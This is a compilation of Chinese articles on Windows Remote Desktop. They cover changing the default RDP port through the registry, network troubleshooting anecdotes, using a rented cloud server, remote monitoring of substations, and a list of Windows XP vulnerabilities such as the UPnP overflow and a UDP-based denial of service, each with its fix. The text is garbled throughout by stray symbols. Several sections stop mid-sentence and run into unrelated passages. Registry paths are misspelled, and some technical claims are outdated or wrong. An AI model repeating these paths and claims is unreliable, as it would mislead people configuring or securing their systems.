導(dǎo)語:在遠(yuǎn)程桌面連接命令的撰寫旅程中���,學(xué)習(xí)并吸收他人佳作的精髓是一條寶貴的路徑���,好期刊匯集了九篇優(yōu)秀范文��,愿這些內(nèi)容能夠啟發(fā)您的創(chuàng)作靈感��,引領(lǐng)您探索更多的創(chuàng)作可能。
第1篇
“遠(yuǎn)程桌面連接”的前身應(yīng)該是Telnet���。Telnet是一種字符界面的登陸方式�����。微軟將其擴(kuò)展到圖形界面上��,顯示了異常強(qiáng)大的功能�����。
在日常工作交流中,我們常常會(huì)用到遠(yuǎn)程桌面連接功能�����,許多人會(huì)認(rèn)為這樣的功能簡單得幾乎不值一提��,不過在實(shí)際使用過程中���。我們有時(shí)會(huì)遇到各種特殊的遠(yuǎn)程桌面連接需求��,要想順利滿足這些特殊的連接需求���,就必須要掌握一些遠(yuǎn)程桌面連接的使用技巧���。
讓遠(yuǎn)程桌面連接端品躲避攻擊
大家知道,在默認(rèn)狀態(tài)下遠(yuǎn)程桌面使用的端口一般為“3389”���,如果我們不及時(shí)將這個(gè)端口號碼更改掉的話���。那么許多別有用心的黑客可能會(huì)利用這個(gè)端口,來遠(yuǎn)程控制和入侵本地工作站��,以便竊取保存在本地工作站中的各類隱私信息���。為了保護(hù)本地工作站的安全���。我們可以嘗試按照如下步驟,將遠(yuǎn)程桌面連接使用的默認(rèn)端口號碼更改成其他的端口號碼:
首先��,以特權(quán)身份登錄進(jìn)本地工作站系統(tǒng)�����,并用鼠標(biāo)逐一單擊系統(tǒng)桌面中的“開始”�����、“運(yùn)行”命令,從彈出的系統(tǒng)運(yùn)行框中�����,輸入字符串命令“regedit”�����,單擊“確定”按鈕后���,打開本地工作站的系統(tǒng)注冊表編輯界面��。
其次��,在該編輯界面的左側(cè)顯示區(qū)域,用鼠標(biāo)展開HKEY_LO-CAL_MACHINE注冊表分支���,從其后彈出的分支列表中依次選中SYSTEMk\CurrentControlSet\Control\TerminalServer\WdsrdpwdTd-stcp子鍵�����,在tcp子鍵所對應(yīng)的右側(cè)顯示區(qū)域中���,我們會(huì)看到一個(gè)名為PortNumber的子鍵���,這個(gè)子鍵其實(shí)就是用來定義遠(yuǎn)程桌面連接端口號碼的,將該子鍵的數(shù)值設(shè)置成其他端口號碼���,例如可以將其數(shù)值設(shè)置成“9999”���。
完成數(shù)值修改操作后。我們再將鼠標(biāo)定位于注冊表分支HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl\SetContro\Ter-minalServer\WinStations\RDP-Tcp���,在RDP-Tcp子鍵所對應(yīng)的右側(cè)顯示區(qū)域中���,我們同樣會(huì)看到一個(gè)名為PortNumber的子鍵,把該子鍵的數(shù)值也要一并修改過來�����,例如這里我們也要將它的數(shù)值修改成“9999”�����。
完成本地工作站的遠(yuǎn)程桌面連接端口號碼后。我們?nèi)蘸笮枰ㄟ^遠(yuǎn)程桌面連接到該工作站時(shí)�����,我們需要打開對應(yīng)工作站中的遠(yuǎn)程桌面連接設(shè)置窗口��,并在其中設(shè)置好需要遠(yuǎn)程連接的工作站地址�����,之后單擊“另存為”按鈕將遠(yuǎn)程桌面設(shè)置保存成文件���。接著用寫字板之類的文本編輯程序?qū)⑶懊姹4嫔傻腞DP文件打開��,并在文本編輯區(qū)域中手工輸入一行“serverport:i:9999”這樣的語句���,再將該文件按照原名重新保存一下,這樣一來我們?nèi)蘸缶湍芡ㄟ^遠(yuǎn)程桌面安全地連接到本地工作站中了���。其他用戶只要不知道新的遠(yuǎn)程桌面端口號碼�����,他們就無法與本地工作站創(chuàng)建遠(yuǎn)程桌面連接了,那么本地工作站的安全性就會(huì)得到大大增強(qiáng)!
善用遠(yuǎn)程桌面連接進(jìn)行傳輸文件
在局域網(wǎng)中傳輸文件時(shí),相信多數(shù)人都會(huì)通過文件共享的方式來進(jìn)行�����,可是設(shè)置成共享狀態(tài)的目標(biāo)文件很容易被其他人偷看到��,而且一些別有用心的人還會(huì)通過共享通道對本地工作站實(shí)施攻擊��。為了確保在局域網(wǎng)中能夠安全地傳輸文件��,我們可以利用遠(yuǎn)程桌面連接程序中自帶的磁盤映射功能�����,來讓局域網(wǎng)中的文件傳輸進(jìn)行得更安全���、更簡便�����,下面就是利用遠(yuǎn)程桌面功能進(jìn)行文件傳輸?shù)木唧w操作步驟:
第2篇
最近��,單位局域網(wǎng)中的一位員工向筆者反映���,說他的計(jì)算機(jī)系統(tǒng)發(fā)生了一種蹊蹺故障,當(dāng)Windows系統(tǒng)剛啟動(dòng)成功這段時(shí)間,局域網(wǎng)中的其他計(jì)算機(jī)能正常訪問他的共享文件夾���,不過只要他離開自己的計(jì)算機(jī)一段時(shí)間��,其他員工再訪問他的共享資源時(shí)���,就會(huì)遇到錯(cuò)誤提示。
聽了這位員工的故障描述后�����,筆者也覺得有點(diǎn)莫名其妙�����,于是立即趕到故障現(xiàn)場�����,仔細(xì)查看了故障計(jì)算機(jī)系統(tǒng)的運(yùn)行狀態(tài)�����,發(fā)現(xiàn)系統(tǒng)配置一切正常��,使用ping命令測試網(wǎng)卡設(shè)備的連通性,也沒有看出異常之處���。之后,筆者嘗試著將故障計(jì)算機(jī)系統(tǒng)空閑了一段時(shí)間��,再用ping命令測試網(wǎng)卡設(shè)備�����,發(fā)現(xiàn)網(wǎng)卡設(shè)備的地址這次竟然無法ping通了�����,很顯然問題出在計(jì)算機(jī)的網(wǎng)卡設(shè)備上��。
為了弄清楚故障原因�����,筆者立即用鼠標(biāo)右鍵單擊故障計(jì)算機(jī)系統(tǒng)桌面上的
網(wǎng)卡設(shè)備�����,彈出目標(biāo)網(wǎng)卡設(shè)備屬性對話框��。在這里,筆者依次進(jìn)入各個(gè)不同的標(biāo)簽設(shè)置頁面��,對各項(xiàng)參數(shù)進(jìn)行了認(rèn)真檢查���。當(dāng)切換到“電源管理”標(biāo)簽設(shè)置頁面時(shí)��,筆者終于找到了故障原因��,原來這與Windows系統(tǒng)的電源管理功能有關(guān)���,缺省狀態(tài)下Windows系統(tǒng)只要在空閑時(shí)間達(dá)到規(guī)定數(shù)值后,就會(huì)自動(dòng)關(guān)閉網(wǎng)卡設(shè)備的電源���,以便有效節(jié)約電源消耗���。在筆者嘗試著將如圖1所示頁面中的“允許計(jì)算機(jī)關(guān)閉此設(shè)備以節(jié)約電源”選項(xiàng)取消選中時(shí),上面的共享訪問故障果然消失不見了��。事后總結(jié)時(shí)���,筆者認(rèn)為網(wǎng)卡設(shè)備的電源管理屬性��,如果設(shè)置不當(dāng)���,很容易成為共享訪問的設(shè)防“關(guān)卡”���。
為了方便單位共享資源整合,有效改善網(wǎng)絡(luò)管理效率��,作為網(wǎng)絡(luò)管理員的小周最近將局域網(wǎng)的工作組環(huán)境升級到了域環(huán)境�����,同時(shí)將單位所有員工的計(jì)算機(jī)全部添加到了指定域中��,大大增強(qiáng)了對域計(jì)算機(jī)的控制力度���。可是���,當(dāng)網(wǎng)管員小周嘗試將某臺(tái)安裝了Windows 7系統(tǒng)的計(jì)算機(jī)添加到指定域中時(shí)���,卻看到有員工通過Windows XP系統(tǒng)的遠(yuǎn)程桌面連接程序,訪問這臺(tái)Windows 7系統(tǒng)的共享資源時(shí)��,無論輸入什么權(quán)限的登錄賬號�����,遠(yuǎn)程登錄操作都不能成功。
在這臺(tái)Windows 7計(jì)算機(jī)系統(tǒng)被成功添加到指定域中之前���,小周曾經(jīng)在自己的Windows XP系統(tǒng)中�����,遠(yuǎn)程訪問過Windows 7計(jì)算機(jī)系統(tǒng)中的共享資源���,這次再進(jìn)行嘗試時(shí),發(fā)現(xiàn)遠(yuǎn)程桌面連接真
與傳統(tǒng)的TCP/IPv4通信協(xié)議相比���,TCP/IPv6通信協(xié)議的功能明顯會(huì)強(qiáng)大許多���。為了讓單位局域網(wǎng)也能趕上潮流,筆者決定與時(shí)具進(jìn)��,著手將網(wǎng)絡(luò)客戶端系統(tǒng)的通信協(xié)議升級為TCP/IPv6���。由于Vista以上版本系統(tǒng)默認(rèn)都已經(jīng)安裝好了TCP/ IPv6協(xié)議���,筆者只是對它們進(jìn)行了簡單的地址分配操作���。而對于Windows XP系統(tǒng)來說,筆者特意重新安裝了TCP/IPv6協(xié)議���,之后也為它們分配了合適的地址���。在分配地址時(shí),操作很簡單�����,依次單擊“開始”|“控制面板”命令��,雙擊系統(tǒng)控制面板窗口中的“網(wǎng)絡(luò)和共享中心”圖標(biāo)���,點(diǎn)擊其后界面中的“更改適配器設(shè)置”按鈕,切換到網(wǎng)絡(luò)連接列表界面�����,用鼠標(biāo)右鍵單擊本地連接圖標(biāo)��,執(zhí)行右鍵菜單中的“屬性”命令���,彈出本地連接屬性對話框�����。選中如圖6所示界面中的TCP/IPv6協(xié)議選項(xiàng)�����,按下“屬性”按鈕�����,在其后界面中就能按照需要手工設(shè)置好合適的地址�����,單擊“確定”按鈕即可�����。將客戶機(jī)的通信協(xié)議升級到TCP/IPv6版本后���,明顯感覺到它們的上網(wǎng)速度快了許多��。
不過�����,有的客戶端系統(tǒng)升級協(xié)議之后��,無論是上網(wǎng)訪問還是相互傳輸共享文件��,都無法成功了�����,這讓筆者感到十分蹊蹺���,為什么其他的客戶端系統(tǒng)共享訪問都正常���,而有的系統(tǒng)就不正常呢���?經(jīng)過深入研究�����,筆者終于弄清楚了問題的原因�����,原來這些共享訪問失敗的故障客戶端系統(tǒng)���,無一例外地停用了系統(tǒng)服務(wù)“IP Help”���,而該系統(tǒng)服務(wù)的主要工作就是對TCP/IPv6協(xié)議地址進(jìn)行分析和連接,也就是說���,TCP/IPv6協(xié)議的正常工作需要“IP Help”服務(wù)的支持�����。
找到了故障根源后��,筆者立即用鼠標(biāo)右鍵單擊系統(tǒng)桌面上的“計(jì)算機(jī)”圖標(biāo)���,執(zhí)行快捷菜單中的“管理”命令,切換到計(jì)算機(jī)管理窗口��,依次展開“計(jì)算機(jī)管
第3篇
我馬上大學(xué)畢業(yè)了��,現(xiàn)在這段時(shí)間想好好學(xué)習(xí)一些服務(wù)器知識���,可是我的電腦配置不高���,無法在本地安裝服務(wù)器系統(tǒng)��。請問有沒有什么在線服務(wù)器系統(tǒng)可以學(xué)習(xí)�����?(題號:20160902)
解題思路
如果要在本地電腦安裝或?qū)W習(xí)其他系統(tǒng)��,一種方法是在本地硬盤安裝多系統(tǒng)(可以是實(shí)體系統(tǒng)或者虛擬系統(tǒng))�����,但是安裝實(shí)體雙系統(tǒng)對電腦技術(shù)要求較高���,虛擬系統(tǒng)則要求電腦配置較高。另一種方法則是使用云系統(tǒng)�����,比如現(xiàn)在阿里云等提供虛擬主機(jī)的服務(wù)��,這種虛擬云系統(tǒng)可以馬上使用���,而且可以任意選擇自己所需的系統(tǒng)��,無需在本地硬盤安裝或者進(jìn)行任何設(shè)置���。因此云系統(tǒng)最適合初入職場的朋友選擇使用。
解題方法
現(xiàn)在阿里云主機(jī)對學(xué)生有專門的優(yōu)惠(最低9.9元/月)���,而且提供的全部是正版服務(wù)器系統(tǒng)��,因此非常適合學(xué)生學(xué)習(xí)使用��。首先登錄���,按提示注冊一個(gè)阿里云用戶(學(xué)生用戶需提供學(xué)籍證明)。登錄后點(diǎn)擊“產(chǎn)品與服務(wù)云服務(wù)器ECS實(shí)例創(chuàng)建實(shí)例”���,按提示購買一個(gè)云服務(wù)器��,這里可以根據(jù)自己的實(shí)際需要選擇操作系統(tǒng)�����,阿里云提供Windows Server�����、Freebsd���、Ubuntu等主流常用的正版服務(wù)器系統(tǒng)�����,只要在“公共鏡像”下自行選擇即可(圖1)��。 選擇需要的服務(wù)器系統(tǒng)
完成實(shí)例的創(chuàng)建并付費(fèi)后�����,現(xiàn)在我們就可以開始使用遠(yuǎn)程登錄的方式進(jìn)行學(xué)習(xí)了�����。這里以Windows Server 2008為例���。對于在網(wǎng)吧等公共場所使用電腦的用戶,登錄阿里云網(wǎng)站后打開上述創(chuàng)建的實(shí)例��,點(diǎn)擊其后的“管理更多終端登錄”���,在彈出的窗口中記住VNC登錄密碼��,成功登錄后點(diǎn)擊“發(fā)送遠(yuǎn)程命令Ctrl+Del+Alt”���,在打開的登錄界面中按提示輸入云系統(tǒng)的賬戶名和密碼,進(jìn)入系統(tǒng)后就可以開始學(xué)習(xí)了��,這些都是正版的服務(wù)器系統(tǒng)(圖2)��。
VNC方式只要瀏覽器即可實(shí)現(xiàn)在線連接��,但是實(shí)際操作較為麻煩���。我們還可以使用遠(yuǎn)程桌面連接的方式實(shí)現(xiàn)�����。同上登錄阿里云查看購買的實(shí)例�����,在這里記住服務(wù)器的公網(wǎng)IP地址���,這個(gè)用于遠(yuǎn)程桌面登錄(圖3)���。
在電腦上啟動(dòng)遠(yuǎn)程桌面連接,在“計(jì)算機(jī)名”下輸入上述獲得的公網(wǎng)IP地址�����,用戶為在上述實(shí)例創(chuàng)建中設(shè)置的用戶賬戶�����,成功連接后就可以在遠(yuǎn)程桌面上看到云服務(wù)系統(tǒng)���,具體使用和本機(jī)安裝的系統(tǒng)沒有什么區(qū)別���。這樣大學(xué)生們通過低廉的花費(fèi)就可以輕松學(xué)習(xí)各種正版服務(wù)器的使用了。
本期挑戰(zhàn)題
題號:20161101
難度:4分
挑戰(zhàn)題描述:同許多人一樣��,我喜歡瀏覽微信上的精彩內(nèi)容��,但是一旦沒有網(wǎng)絡(luò)就不能瀏覽���。問題來了�����,有沒有什么辦法可以將微信上的內(nèi)容給緩存下來并在無網(wǎng)的條件瀏覽呢��?
題號:20161101
第4篇
關(guān)鍵詞 變電站���;遠(yuǎn)程監(jiān)控系統(tǒng);遠(yuǎn)程桌面�����;綜合自動(dòng)化
中圖分類號 TM7340 文獻(xiàn)標(biāo)識碼 A 文章編號 1673-9671-(2012)102-0149-01
隨著不斷廣泛應(yīng)用和飛速發(fā)展的電力自動(dòng)化系統(tǒng)技術(shù)���,變電站的運(yùn)行模式也大多變成了無人值班��,這一現(xiàn)象在低于220kV的電力系統(tǒng)變電站內(nèi)尤為普遍�����。為了能夠隨時(shí)監(jiān)控到站內(nèi)設(shè)備的運(yùn)轉(zhuǎn)情況���,同時(shí)在第一時(shí)間內(nèi)解決診斷設(shè)備出現(xiàn)的故障等問題,遠(yuǎn)程維護(hù)電力自動(dòng)化系統(tǒng)就成為了大勢所趨��。
1 遠(yuǎn)程桌面
對于無人值班的電力自動(dòng)化系統(tǒng)進(jìn)行全時(shí)監(jiān)控,并處理出現(xiàn)的問題和故障��,一直以來都是國內(nèi)相關(guān)科研人員的工作重點(diǎn)��。然而盡管已經(jīng)確實(shí)提供了一些工程方案��,但都存在著如下幾點(diǎn)問題:首先是由于可能存在著不同廠家生產(chǎn)的變電站自動(dòng)化系統(tǒng)�����,致使系統(tǒng)維護(hù)的難度大為增加�����;其次是維護(hù)工作只有在全面掌握變電站運(yùn)行情況的基礎(chǔ)上才能展開��,對于數(shù)據(jù)庫的處理能力和庫容量而言不堪重荷��;再次是每種信息過于繁多的協(xié)議傳輸和采集方式�����;最后是遠(yuǎn)程維護(hù)系統(tǒng)單獨(dú)對口各個(gè)變電站��,則造成過大的成本投資等���。因此,將遠(yuǎn)程維護(hù)方案建立在遠(yuǎn)程桌面的基礎(chǔ)上,借由2M專網(wǎng)或調(diào)度數(shù)據(jù)網(wǎng)來實(shí)現(xiàn)監(jiān)控機(jī)的遠(yuǎn)程控制��,成為了更加切實(shí)可行的新技術(shù)。微軟的遠(yuǎn)程桌面協(xié)議���,是其操作系統(tǒng)的遠(yuǎn)程桌面功能工作的平臺(tái)���。借助RDP���,即使在網(wǎng)絡(luò)的另一端�����,對于遠(yuǎn)程計(jì)算機(jī)里的網(wǎng)絡(luò)資源��、應(yīng)用程序和數(shù)據(jù)���,客戶端電腦都可以輕松實(shí)現(xiàn)控制,這樣相應(yīng)的服務(wù)就可以通過正在運(yùn)行的遠(yuǎn)程服務(wù)器上的相應(yīng)程序獲得��。比如:后臺(tái)操作和登陸可以通過交互式進(jìn)行��,速度很快,也具備穩(wěn)定的性能��。遠(yuǎn)程主機(jī)借由該服務(wù)器登陸后��,除了無法實(shí)現(xiàn)物理接觸外���,可以實(shí)現(xiàn)與本地電腦相同的命令運(yùn)行��、程序刪除以及各項(xiàng)操作等內(nèi)容�����。為了能夠使數(shù)據(jù)在借助通信進(jìn)行交互時(shí)的可靠性和安全性得到保證���,加密和數(shù)字簽名是RDP過程采取的兩種辦法,同時(shí)加密算法使用的是RC4和MD5�����,對于數(shù)據(jù)包整個(gè)在傳輸過程中的解密��、加密�����,可以可靠、有效地完成�����。同時(shí)微軟公司為了防止黑客竊取數(shù)據(jù)���,進(jìn)一步將遠(yuǎn)程桌面的安全級別提高��,附加了一個(gè)安全認(rèn)證的方式��,對于信息的加密通過安全套接層來完成��。
2 監(jiān)控機(jī)操作系統(tǒng)升級
即便是發(fā)展至今的微軟操作系統(tǒng)中,遠(yuǎn)程桌面功能能夠?qū)崿F(xiàn)的平臺(tái)軟件也只有3款:Windows 2003��、Windows XP和Windows 2000 Server���。Windows 2000目前廣泛應(yīng)用于國內(nèi)的監(jiān)控機(jī)操作系統(tǒng)���,選擇3個(gè)系統(tǒng)中的一個(gè)作為升級版本即可,之后將遠(yuǎn)程桌面功能開啟���。除了對遠(yuǎn)程監(jiān)控機(jī)中的全部網(wǎng)絡(luò)資源��、文件和程序進(jìn)行控制外��,遠(yuǎn)程桌面并不影響到本地任何程序的正常運(yùn)行��,同時(shí)遠(yuǎn)程桌面還能夠?qū)崿F(xiàn)如下功能:首先是在遠(yuǎn)程會(huì)話中進(jìn)行粘貼和剪切操作�����。剪貼板在多數(shù)中斷服務(wù)器和遠(yuǎn)程桌面連接中可以共享���,這樣就實(shí)現(xiàn)了在剪貼板上�����,本地內(nèi)容和遠(yuǎn)程桌面內(nèi)容的一致同步���,進(jìn)而在本地電腦所運(yùn)行的程序里,粘貼���、剪切從遠(yuǎn)程桌面會(huì)話運(yùn)行程序里的內(nèi)容��。比如在“遠(yuǎn)程桌面連接”窗口中的文檔里��,對圖形和文本進(jìn)行剪切和復(fù)制��,之后在本地電腦的文檔里進(jìn)行粘貼��。其次是將本地資源供給終端服務(wù)器使用�����。以網(wǎng)絡(luò)上不同設(shè)置的組策略為根據(jù)��,從而決定是否通過本地電腦上的智能卡��、打印機(jī)�����、串行口和磁盤驅(qū)動(dòng)器被終端服務(wù)器訪問���,叫做“資源重定向”。只有資源重定向被設(shè)置的組策略禁止���,否則該資源在會(huì)話期間可以被終端服務(wù)器加以使用�����。比如��,假設(shè)使用者決定允許終端服務(wù)器使用本地磁盤驅(qū)動(dòng)器��,即允許本地文件夾和文件可以被遠(yuǎn)程會(huì)話訪問���,那么就會(huì)大大簡化將文件從終端服務(wù)器復(fù)制出來或者在終端服務(wù)器里復(fù)制進(jìn)文件的過程��。最后是中斷服務(wù)使用快捷鍵功能���。在“遠(yuǎn)程桌面連接”的窗口中點(diǎn)擊“本地資源”的選項(xiàng),可以實(shí)現(xiàn)多種同樣的功能通過快捷鍵的形式在終端服務(wù)器上開始執(zhí)行���。
3 遠(yuǎn)程控制監(jiān)控機(jī)的工作原理和內(nèi)容
現(xiàn)在��,以同步數(shù)字系列的專用光纜為基礎(chǔ)���,電力系統(tǒng)的通信網(wǎng)規(guī)模在我國已經(jīng)初步形成,并且由于傳統(tǒng)的中央信號��、開光控制和繼電保護(hù)裝置系統(tǒng)���,正在逐步地被高速LAN的廠站和現(xiàn)場總線的自動(dòng)化系統(tǒng)取替�����,當(dāng)遠(yuǎn)程終端單元屬于非網(wǎng)絡(luò)型時(shí)���,調(diào)度數(shù)據(jù)網(wǎng)的接入可以通過改造從而實(shí)現(xiàn)���;當(dāng)IED不具備網(wǎng)絡(luò)接口時(shí),網(wǎng)絡(luò)接入可以通過連接遠(yuǎn)動(dòng)轉(zhuǎn)換協(xié)議設(shè)備與串口進(jìn)而實(shí)現(xiàn)���,此種模式下無需改動(dòng)任何的IED�����,因此可以預(yù)見的必然趨勢是:網(wǎng)絡(luò)化傳輸遠(yuǎn)動(dòng)信息的模式��。借助網(wǎng)絡(luò)���,維護(hù)和監(jiān)控智能設(shè)備也更加簡便可行。通常情況下�����,按照2個(gè)方向傳輸變電站的全部四遙信息:一則是借助RTU到集控站自動(dòng)化系統(tǒng)或數(shù)據(jù)采集與調(diào)度監(jiān)控系統(tǒng)�����;再則是對本地監(jiān)控機(jī)進(jìn)行直接傳給�����。在對SCADA系統(tǒng)進(jìn)行調(diào)度時(shí)的處理能力和數(shù)據(jù)庫容量進(jìn)行充分考慮后�����,加之將信息量減少�����,進(jìn)而防治電網(wǎng)調(diào)度運(yùn)行受到歷史信息以及不分主次���、大量的實(shí)時(shí)信息的干擾���,在對SCADA系統(tǒng)進(jìn)行調(diào)度時(shí),通常只對重要的四遙信息進(jìn)行接收�����,比如針對遙信而言���,通常只對硬結(jié)點(diǎn)遙信進(jìn)行采集���。對于本地監(jiān)控機(jī)來說�����,因?yàn)橹挥幸粋€(gè)廠站是指定內(nèi)容��,原則上��,對于該變電站的全部歷史信息和實(shí)時(shí)信息加以接收�����,同時(shí)其功能十分強(qiáng)大��。絕大多數(shù)的自動(dòng)化系統(tǒng)均為一家廠商所制造��,其綜合自動(dòng)化設(shè)備和本地后臺(tái)監(jiān)控系統(tǒng)一致�����,維護(hù)和監(jiān)視自動(dòng)化設(shè)備的工作�����,只需適當(dāng)改造本地監(jiān)控系統(tǒng)就能夠得到實(shí)現(xiàn)和加強(qiáng)��,做到不包含在SCADA系統(tǒng)中的信息���,甚至是所有信息的查詢、監(jiān)視和采集�����。比如將RTU組態(tài)程序安裝在國電南自的PSX600和南瑞繼保公司的RCS-9700變電站自動(dòng)化系統(tǒng)上以后���,維護(hù)和監(jiān)視RTU的工作就能通過網(wǎng)絡(luò)直接進(jìn)行���,包括了RTU程序升級、對RTU收發(fā)碼進(jìn)行監(jiān)視以及下裝組態(tài)等功能���。
4 遠(yuǎn)程桌面系統(tǒng)的特點(diǎn)及安全控制
首先�����,遠(yuǎn)程桌面圖像監(jiān)控系統(tǒng)對于無人值班的變電站非常適用���,能夠?qū)ψ冸娬驹O(shè)備的運(yùn)行情況以及防盜問題、防火問題、發(fā)熱情況和操作情況進(jìn)行監(jiān)視�����,同時(shí)逐步結(jié)合現(xiàn)場操作人員的遠(yuǎn)方監(jiān)視操作���,如有必要�����,可以向上級計(jì)算機(jī)網(wǎng)絡(luò)上傳監(jiān)控中心所收集到的信息和圖像數(shù)據(jù)��,便于網(wǎng)絡(luò)用戶進(jìn)行調(diào)閱查看�����。其次��,由于物理距離上變電站比較遠(yuǎn)���,動(dòng)輒數(shù)百、數(shù)十公里��,其連接方式多為電話線��、微波或光線進(jìn)行通信,必須解壓縮和壓縮監(jiān)控中心接收到的信號圖像信息�����,所以與現(xiàn)場的模擬信號相比較而言���,圖像質(zhì)量會(huì)稍有損失,為了避免過多地?fù)p失圖像質(zhì)量��,應(yīng)該對解壓縮和壓縮的方式慎重考慮選擇��。再次�����,布防和撤防功能要做到位���。當(dāng)工作人員在變電站時(shí)��,應(yīng)該撤防�����,避免誤報(bào)警�����。當(dāng)無人值守變電站時(shí)�����,應(yīng)及時(shí)布防���。最后�����,要明確鏡頭和云臺(tái)是主要的控制對象�����,包括了變倍變焦�����、調(diào)整光圈��、聚焦鏡頭���、上下俯仰和左右旋轉(zhuǎn)等功能��。
5 結(jié)束語
以遠(yuǎn)程桌面系統(tǒng)為基礎(chǔ)���,對變電站等電力自動(dòng)化系統(tǒng)進(jìn)行遠(yuǎn)程運(yùn)行、監(jiān)控和維護(hù)的反感�����,不僅便于實(shí)現(xiàn)���,而且投資額不大,其實(shí)際應(yīng)用的意義非常重大��。通過在梅亭集控站和蕪湖供電公司的實(shí)際使用效果來看��,具有非常大的功能效用和發(fā)展前景�����。該項(xiàng)技術(shù)的發(fā)展和完善��,將對無人值班的電力自動(dòng)化系統(tǒng)的監(jiān)控工作產(chǎn)生積極作用���。對于提高無人值班電力自動(dòng)化系統(tǒng)運(yùn)行的安全性有著直接的影響�����。
參考文獻(xiàn)
第5篇
微軟windows xp以其出色的兼容性和移動(dòng)性贏得了廣泛的好評和認(rèn)同���,但是它也存在著大量系統(tǒng)漏洞���,黑客利用系統(tǒng)的漏洞可以對電腦進(jìn)行攻擊,讓你無法上網(wǎng)���,對一些分區(qū)格式化�����,侵入計(jì)算機(jī)偷盜,從而造成巨大的的損失���!
如何保證windows xp安全呢?比較好的辦法就是下載windows安全補(bǔ)丁���。microsofe公司會(huì)在網(wǎng)上提供一些免費(fèi)的補(bǔ)丁���,我們只要及時(shí)打補(bǔ)丁,就可以增強(qiáng)兼容性�����,堵上漏洞,增強(qiáng)系統(tǒng)的安全性��!
windows xp安全漏洞主要有以下五種:
一��、切換功能漏洞
windows xp快速用戶切換功能存在漏洞��,當(dāng)你單擊“開始”/注銷/“切換用戶”啟動(dòng)快速用戶切換功能���,在傳統(tǒng)登陸方法下重試登錄一個(gè)用戶名時(shí)�����,系統(tǒng)會(huì)誤認(rèn)為有暴力猜解攻擊,因而會(huì)鎖定全部非管理員賬號���。
解決辦法:單擊控制面板/用戶帳戶/更改用戶登錄或注銷的方式��,取消“使用快速用戶切換”�����,以便禁用用戶快速切換功能��。
二��、即插即用漏洞
upnp亦稱通用即插即用軟件(全稱universal plug and play)�����,微軟這個(gè)軟件是基于互聯(lián)網(wǎng)協(xié)議的�����,它允許不同的設(shè)備如電腦���、掃描儀��、打印機(jī)聯(lián)成網(wǎng)絡(luò)���,可以在彼此之間自動(dòng)識別,并進(jìn)行通信���,xp操作系統(tǒng)在發(fā)售時(shí)就已經(jīng)激活了upnp功能���。然而,upnp也存在安全漏洞。黑客可以利用該軟件上的漏洞控制同一網(wǎng)絡(luò)上的電腦���,或者發(fā)動(dòng)dos攻擊�����。具體來講��,upnp服務(wù)可以導(dǎo)致以下兩個(gè)安全漏洞:
(一)緩沖溢出問題
upnp存在緩沖區(qū)溢出問題��,是windows有史以來最嚴(yán)重的緩沖溢出漏洞���,當(dāng)處理 notify 命令中的location字段時(shí),如果ip地址��、端口和文件名部分超長�����,就會(huì)發(fā)生緩沖區(qū)溢出��,由此會(huì)造成服務(wù)器程序的一些進(jìn)程���,其內(nèi)存空間的內(nèi)容被覆蓋。由于upnp服務(wù)運(yùn)行在系統(tǒng)的上下文,攻擊者如果利用漏洞成功��,可以完全控制主機(jī)���。
解決方法:對于win xp用戶��,應(yīng)該立即安裝補(bǔ)?�?����;對于win me用戶��,只有在運(yùn)行了upnp的情況下才需要該補(bǔ)?����?�;對于win98用戶��,由于其中并沒有upnp�����,只有當(dāng)用戶自己安裝了upnp的情況下�����,才需要使用該補(bǔ)丁��。
(二)系統(tǒng)容易被欺騙
對運(yùn)行了upnp服務(wù)的系統(tǒng)實(shí)施攻擊�����,只要向該系統(tǒng)的1900端口發(fā)送一個(gè)udp包�����,其中“location”域的地址指向另一個(gè)系統(tǒng)的chargen端口��,就可能使系統(tǒng)進(jìn)入一個(gè)無限的連接循環(huán)�����,這將會(huì)導(dǎo)致受影響系統(tǒng) cpu 和內(nèi)存占用率達(dá)100%���,使遠(yuǎn)程xp系統(tǒng)完全不能使用而拒絕了服務(wù),只有通過重啟后系統(tǒng)才能恢復(fù)正
轉(zhuǎn)貼于
常���。
解決辦法:完全關(guān)閉upnp服務(wù)�����,因?yàn)榇蠖鄶?shù)的人都不用他們�����。請記?��。悍?wù)開得越少���,就越安全。單擊xp的控制面板/管理工具/服務(wù)�����,雙擊“universal plug and play device host”服務(wù)��,在啟動(dòng)類型中選擇“已禁用”關(guān)閉upnp服務(wù)���。
三�����、熱鍵漏洞
熱鍵打開程序很方便��。當(dāng)用戶登陸win xp時(shí)��,熱鍵功能隨之啟動(dòng)��。如果你的電腦沒有設(shè)置屏幕保護(hù)程序和密碼��,而你需要暫時(shí)離開電腦���,辦理其他事情�����,win xp就會(huì)在處于靜止?fàn)顟B(tài)一段時(shí)間后進(jìn)行自動(dòng)注銷���,不過這種“注銷”是一種假注銷,你所有的后臺(tái)程序都還在運(yùn)行���,與沒有注銷前幾乎沒有什么差別���,因此其他人雖然進(jìn)不了你的桌面,看不到你的電腦里放了些什么���,但是卻可以繼續(xù)使用熱鍵��。比如打開n個(gè)大程序���,破壞你的機(jī)器,打開并使用某個(gè)程序���,特別是一些與網(wǎng)絡(luò)有關(guān)的敏感程序(和服務(wù))���。
解決辦法:在離開計(jì)算機(jī)的時(shí)候,還是按下windows鍵+l鍵�����,鎖定計(jì)算機(jī)���;或者打開屏幕保護(hù)程序�����、并設(shè)置密碼��;或者檢查可能會(huì)帶來危害的程序和服務(wù)的熱鍵���,取消這些熱鍵���。
四、遠(yuǎn)程控制漏洞
當(dāng)連接建立的時(shí)候��,windows xp遠(yuǎn)程桌面把賬戶名以明文發(fā)送給連接它的客戶端�����。發(fā)送的賬戶名不一定是遠(yuǎn)端主機(jī)的用戶賬號���,也可以是最常被客戶端使用的賬戶名���,網(wǎng)絡(luò)上的嗅探程序可能會(huì)捕獲到這些賬戶信息。
建立網(wǎng)絡(luò)連接時(shí)��,win xp遠(yuǎn)程桌面會(huì)把用戶名以明文形式�����、發(fā)送到連接它的客戶端��。發(fā)送的用戶名可以是遠(yuǎn)端主機(jī)的用戶名,也可能是客戶端常用的用戶名��,網(wǎng)絡(luò)上的嗅探程序可能會(huì)捕獲到這些賬戶信息�����。
安全對策:單擊控制面板/系統(tǒng)/遠(yuǎn)程���,取消“允許用戶遠(yuǎn)程連接到這臺(tái)計(jì)算機(jī)”,以便停止遠(yuǎn)程桌面使用��。
五���、“幫助和支持中心”漏洞
